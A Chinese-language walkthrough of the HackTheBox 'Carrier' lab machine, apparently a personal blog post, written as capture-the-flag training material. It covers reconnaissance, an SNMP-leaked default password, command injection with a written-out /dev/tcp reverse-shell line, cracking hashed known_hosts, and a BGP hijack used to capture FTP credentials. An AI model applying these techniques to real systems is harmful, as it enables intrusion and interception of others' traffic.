2021-01-13 HTB Carrier walkthrough

真的是在HTB上面碰到的最复杂的一个机器了，不禁感叹技术没有边界，我也仅仅接触了一点点。
Target IP：10.10.10.105

信息搜集

nmap

照例开局扫端口

nmap.png

发现ssh和http开放，而ftp端口filtered，暂时不清楚情况。
继续访问http服务，发现一个登录页面Lyghtspeed

lyghtspeed.png

试了试弱口令以及万能密码，并没有什么效果，继续尝试目录扫描

gobuster

gobuster.png

里面的几个目录比较值得注意，分别是/doc，/tools，/debug
/tools里面只有一个remote.php，点开后没什么可注意的，就是提示了一下License过期。

tools.png

/debug里面是一个phpinfo界面

debug.png

/doc里面有两个文件
其中一个网络拓扑图，目前看来也没什么用

diag.png

还有个文档，文档中的错误码值得注意

errordoc.png

回想登录界面有错误提示，可以知道登录面板的用户名和密码还是初始化状态，但是具体初始化的用户名和密码到底是什么还不清楚，根据文档中的提示是和序列号有关。
到此发现好像又没什么思路了。。。

nmap udp扫描

无奈再查了查相关walkthrough，发现他们还进行了udp扫描

nmap udp.png

161端口开放了snmp
利用snmpwalk连接161端口，看看有没有什么消息

snmpwalk.png

看到了一串字符串，刚开始没什么反应，后来想想这SN#不就是serial number的意思。。
尝试利用admin:NET_45JDX23登录80端口的服务，登录成功

loged in.png

尝试获取user.txt

Diagnostics页面十分值得注意

ps.png

看起来是ps aux | grep `echo $input | base64 -d`这样形式的一个系统指令，因此可以尝试抓包进行命令执行
尝试执行ls

ls.png

发现指令成功执行，这时感觉距离成功非常近了（too young too simple）
利用/bin/sh -i > /dev/tcp/ip/port 0<&1 2>&1进行反弹shell，成功获取到shell，读到user.txt

getshell.png

获取root.txt

进去后，感觉还挺奇怪的，因为普通的HTB机器应该不会直接给root权限，而是需要通过某种方式进行一个提权操作，然后读到root目录里面的root.txt
但是这台机器直接给了root权限，而且找不到root.txt
根据之前翻到的那个截图，感觉可能需要在内网进行一次横向转移
先翻看了.ssh目录，看看有没有什么可以登录的服务器

detect.png

known_hosts被加密了，这时候利用网上搜来的工具对known_hosts里面存在的ip进行爆破。

hashcrack.png

获取到了两个IP

10.120.15.10
10.99.64.2

尝试ssh直接免密登录，并不能成功
传个nmap上去，扫一下端口试试

nmapnew.png

看到ftp开着，匿名登录进去毫无斩获，此时又失了头绪。
再经过walkthrough点拨，才悟到，整个系统是一个bgp网络，不同的设备部署在不同的ISP内部。

routemap.png

根据网站上ticket中6号介绍，可能需要从10.120.15.10的ftp服务中获取一定的信息。

6 Closed Rx / CastCom. IP Engineering team from one of our upstream ISP called to report a problem with some of their routes being leaked again due to a misconfiguration on our end. Update 2018/06/13: Pb solved: Junior Net Engineer Mike D. was terminated yesterday. Updated: 2018/06/15: CastCom. still reporting issues with 3 networks: 10.120.15,10.120.16,10.120.17/24's, one of their VIP is having issues connecting by FTP to an important server in the 10.120.15.0/24 network, investigating... Updated 2018/06/16: No prbl. found, suspect they had stuck routes after the leak and cleared them manually.

BGP劫持

所以攻击思路就有了，利用BGP劫持，把访问10.120.15.10的ftp流量接收过来，看看能发现点什么
先配置BGP：r1上面利用vtysh进行路由配置

bgpsetting.png

配路由器可是老本行了。敲出conf t的时候扑面而来一股熟悉的味道。
配置network 10.250.15.0/25的意思是声明10.250.15.0/25这个网络在我的服务中，这样就会在边界路由交换BGP信息后，选择把10.250.15.0/25的ip传给我这台路由器而不是AS300
此时还要把和AS300相连的eth2断掉，IP地址改成我们所需要的伪装的IP，然后监听21端口

imitate.png

顺利地获取到了登录10.120.15.10这台机器的ftp口令
然后只需要用它登录ftp或者ssh就可以了（二者均可）
登录前记得把整个网络恢复（包括BGP设定和eth2网卡设置），不然不能访问这台机器

ftpfinal.png

最终获取到root.txt的内容

总结

今天这个机器是目前来说做过的最耗时耗力的一个，但是真的物有所值。
不仅温习了一边配路由器的知识，期间我还因为ftp服务器的缘故纠结了好多错误的东西。
还是希望以后能更少看walkthrough，全凭自己的能力。
另外希望不久后能有勇气看看HTB的难题，而不是继续在中级题里面划水。。